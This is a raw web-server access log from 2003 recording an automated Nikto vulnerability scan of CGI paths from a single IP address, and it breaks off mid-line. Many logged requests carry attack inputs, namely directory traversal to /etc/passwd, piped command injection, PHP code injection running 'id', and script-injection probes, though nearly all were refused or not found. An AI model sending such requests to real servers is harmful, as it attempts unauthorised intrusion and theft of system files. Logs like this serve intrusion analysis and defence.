212.92.77.254 - - [24/Jul/2003:01:47:29 +0900] "GET /cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[[' HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:29 +0900] "GET /cgi.cgi/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir= HTTP/1.0" 403 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:30 +0900] "GET /cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir= HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:31 +0900] "GET /cgi.cgi/auktion.cgi?menue=../../../../../../../../../../etc/passwd HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:32 +0900] "GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:32 +0900] "GET /cgi.cgi/auth_data/auth_user_file.txt HTTP/1.0" 403 312 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:33 +0900] "GET /cgi-bin/auth_data/auth_user_file.txt HTTP/1.0" 404 308 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:34 +0900] "GET /cgi.cgi/awl/auctionweaver.pl HTTP/1.0" 403 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:34 +0900] "GET /cgi-bin/awl/auctionweaver.pl HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:35 +0900] "GET /cgi.cgi/awstats.pl HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:36 +0900] "GET /cgi-bin/awstats.pl HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:37 +0900] "GET /cgi.cgi/ax-admin.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:37 +0900] "GET /cgi-bin/ax-admin.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:38 +0900] "GET /cgi.cgi/ax.cgi HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:39 +0900] "GET /cgi-bin/ax.cgi HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:39 +0900] "GET /cgi.cgi/axs.cgi HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:40 +0900] "GET /cgi-bin/axs.cgi HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:41 +0900] "GET /cgi.cgi/badmin.cgi HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:42 +0900] "GET /cgi-bin/badmin.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:42 +0900] "GET /cgi.cgi/banner.cgi HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:43 +0900] "GET /cgi-bin/banner.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:44 +0900] "GET /cgi.cgi/bannereditor.cgi HTTP/1.0" 403 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:44 +0900] "GET /cgi-bin/bannereditor.cgi HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:45 +0900] "GET /cgi.cgi/bash HTTP/1.0" 403 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:46 +0900] "GET /cgi-bin/bash HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:47 +0900] "GET /cgi.cgi/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:47 +0900] "GET /cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:48 +0900] "GET /cgi.cgi/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:49 +0900] "GET /cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:49 +0900] "GET /cgi.cgi/bb-histlog.sh HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:50 +0900] "GET /cgi-bin/bb-histlog.sh HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:51 +0900] "GET /cgi.cgi/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:52 +0900] "GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:52 +0900] "GET /cgi.cgi/bbs_forum.cgi HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:53 +0900] "GET /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:54 +0900] "GET /cgi.cgi/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:55 +0900] "GET /cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:55 +0900] "GET /cgi.cgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>; HTTP/1.0" 403 351 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:56 +0900] "GET /cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>; HTTP/1.0" 404 347 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:57 +0900] "GET /cgi.cgi/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters= HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:57 +0900] "GET /cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters= HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:58 +0900] "GET /cgi.cgi/bizdb1-search.cgi HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:59 +0900] "GET /cgi-bin/bizdb1-search.cgi HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:00 +0900] "GET /cgi.cgi/bnbform HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:00 +0900] "GET /cgi-bin/bnbform HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:01 +0900] "GET /cgi.cgi/bnbform.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:02 +0900] "GET /cgi-bin/bnbform.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:02 +0900] "GET /cgi.cgi/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:03 +0900] "GET /cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:04 +0900] "GET /cgi.cgi/boozt/admin/index.cgi?section=5&input=1 HTTP/1.0" 403 305 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:05 +0900] "OPTIONS / HTTP/1.1" 200 - "-" "neon/0.23.5 davfs2 0.2.1" 212.92.77.254 - - [24/Jul/2003:01:48:05 +0900] "GET /cgi-bin/boozt/admin/index.cgi?section=5&input=1 HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:05 +0900] "GET /cgi.cgi/bsguest.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:06 +0900] "GET /cgi-bin/bsguest.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:07 +0900] "GET /cgi.cgi/bslist.cgi HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:07 +0900] "GET /cgi-bin/bslist.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:11 +0900] "GET /cgi.cgi/bulk/bulk.cgi HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:12 +0900] "GET /cgi-bin/bulk/bulk.cgi HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:13 +0900] "GET /cgi.cgi/c32web.exe/ChangeAdminPassword HTTP/1.0" 403 314 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:13 +0900] "GET /cgi-bin/c32web.exe/ChangeAdminPassword HTTP/1.0" 404 310 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:14 +0900] "GET /cgi.cgi/cached_feed.cgi HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:15 +0900] "GET /cgi-bin/cached_feed.cgi HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:15 +0900] "GET /cgi.cgi/cachemgr.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:16 +0900] "GET /cgi-bin/cachemgr.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:17 +0900] "GET /cgi.cgi/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:18 +0900] "GET /cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:18 +0900] "GET /cgi.cgi/calendar/calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.0" 403 310 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:19 +0900] "GET /cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.0" 404 306 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:20 +0900] "GET /cgi.cgi/calendar/index.cgi HTTP/1.0" 403 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:20 +0900] "GET /cgi-bin/calendar/index.cgi HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:21 +0900] "GET /cgi.cgi/calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:22 +0900] "GET /cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:23 +0900] "GET /cgi.cgi/calender_admin.pl HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:23 +0900] "GET /cgi-bin/calender_admin.pl HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:24 +0900] "GET /cgi.cgi/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:25 +0900] "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:25 +0900] "GET /cgi.cgi/campas?%0acat%0a/etc/passwd%0a HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:26 +0900] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:27 +0900] "GET /cgi.cgi/cart.pl HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:28 +0900] "GET /cgi-bin/cart.pl HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:28 +0900] "GET /cgi.cgi/cart32.exe HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:29 +0900] "GET /cgi-bin/cart32.exe HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:30 +0900] "GET /cgi.cgi/cartmanager.cgi HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:30 +0900] "GET /cgi-bin/cartmanager.cgi HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:31 +0900] "GET /cgi.cgi/cbmc/forums.cgi HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:32 +0900] "GET /cgi-bin/cbmc/forums.cgi HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:33 +0900] "GET /cgi.cgi/ccvsblame.cgi?file=/index.html&root=<script>alert('Vulnerable')</script> HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:33 +0900] "GET /cgi-bin/ccvsblame.cgi?file=/index.html&root=<script>alert('Vulnerable')</script> HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:34 +0900] "GET /cgi.cgi/cgi-lib.pl HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:35 +0900] "GET /cgi-bin/cgi-lib.pl HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:35 +0900] "GET /cgi.cgi/cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:36 +0900] "GET /cgi-bin/cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:37 +0900] "GET /cgi.cgi/cgicso?query=AAA HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:38 +0900] "GET /cgi-bin/cgicso?query=AAA HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:38 +0900] "GET /cgi.cgi/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:39 +0900] "GET /cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:40 +0900] "GET /cgi.cgi/cgimail.exe HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:40 +0900] "GET /cgi-bin/cgimail.exe HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:41 +0900] "GET /cgi.cgi/cgiwrap HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:42 +0900] "GET /cgi-bin/cgiwrap HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:43 +0900] "GET /cgi.cgi/cgiwrap/%3Cfont%20color=red%3E HTTP/1.0" 403 314 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:43 +0900] "GET /cgi-bin/cgiwrap/%3Cfont%20color=red%3E HTTP/1.0" 404 310 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:44 +0900] "GET /cgi.cgi/cgiwrap/~adm HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:45 +0900] "GET /cgi-bin/cgiwrap/~adm HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:46 +0900] "GET /cgi.cgi/cgiwrap/~bin HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:46 +0900] "GET /cgi-bin/cgiwrap/~bin HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:47 +0900] "GET /cgi.cgi/cgiwrap/~daemon HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:48 +0900] "GET /cgi-bin/cgiwrap/~daemon HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:48 +0900] "GET /cgi.cgi/cgiwrap/~ftp HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:49 +0900] "GET /cgi-bin/cgiwrap/~ftp HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:50 +0900] "GET /cgi.cgi/cgiwrap/~guest HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:51 +0900] "GET /cgi-bin/cgiwrap/~guest HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:51 +0900] "GET /cgi.cgi/cgiwrap/~listen HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:52 +0900] "GET /cgi-bin/cgiwrap/~listen HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:53 +0900] "GET /cgi.cgi/cgiwrap/~lp HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:53 +0900] "GET /cgi-bin/cgiwrap/~lp HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:54 +0900] "GET /cgi.cgi/cgiwrap/~mysql HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:55 +0900] "GET /cgi-bin/cgiwrap/~mysql HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:56 +0900] "GET /cgi.cgi/cgiwrap/~noaccess HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:56 +0900] "GET /cgi-bin/cgiwrap/~noaccess HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:57 +0900] "GET /cgi.cgi/cgiwrap/~nobody HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:58 +0900] "GET /cgi-bin/cgiwrap/~nobody HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:58 +0900] "GET /cgi.cgi/cgiwrap/~nobody4 HTTP/1.0" 403 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:48:59 +0900] "GET /cgi-bin/cgiwrap/~nobody4 HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:00 +0900] "GET /cgi.cgi/cgiwrap/~nuucp HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:01 +0900] "GET /cgi-bin/cgiwrap/~nuucp HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:01 +0900] "GET /cgi.cgi/cgiwrap/~operator HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:02 +0900] "GET /cgi-bin/cgiwrap/~operator HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:03 +0900] "GET /cgi.cgi/cgiwrap/~root HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:03 +0900] "GET /cgi-bin/cgiwrap/~root HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:04 +0900] "GET /cgi.cgi/cgiwrap/~smmsp HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:05 +0900] "GET /cgi-bin/cgiwrap/~smmsp HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:06 +0900] "GET /cgi.cgi/cgiwrap/~smtp HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:06 +0900] "GET /cgi-bin/cgiwrap/~smtp HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:07 +0900] "GET /cgi.cgi/cgiwrap/~sshd HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:08 +0900] "GET /cgi-bin/cgiwrap/~sshd HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:08 +0900] "GET /cgi.cgi/cgiwrap/~sys HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:09 +0900] "GET /cgi-bin/cgiwrap/~sys HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:10 +0900] "GET /cgi.cgi/cgiwrap/~test HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:11 +0900] "GET /cgi-bin/cgiwrap/~test HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:11 +0900] "GET /cgi.cgi/cgiwrap/~unknown HTTP/1.0" 403 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:12 +0900] "GET /cgi-bin/cgiwrap/~unknown HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:13 +0900] "GET /cgi.cgi/cgiwrap/~uucp HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:13 +0900] "GET /cgi-bin/cgiwrap/~uucp HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:14 +0900] "GET /cgi.cgi/cgiwrap/~web HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:15 +0900] "GET /cgi-bin/cgiwrap/~web HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:16 +0900] "GET /cgi.cgi/cgiwrap/~www HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:16 +0900] "GET /cgi-bin/cgiwrap/~www HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:17 +0900] "GET /cgi.cgi/cgiwrap/~adm HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:18 +0900] "GET /cgi-bin/cgiwrap/~adm HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:18 +0900] "GET /cgi.cgi/cgiwrap/~bin HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:19 +0900] "GET /cgi-bin/cgiwrap/~bin HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - 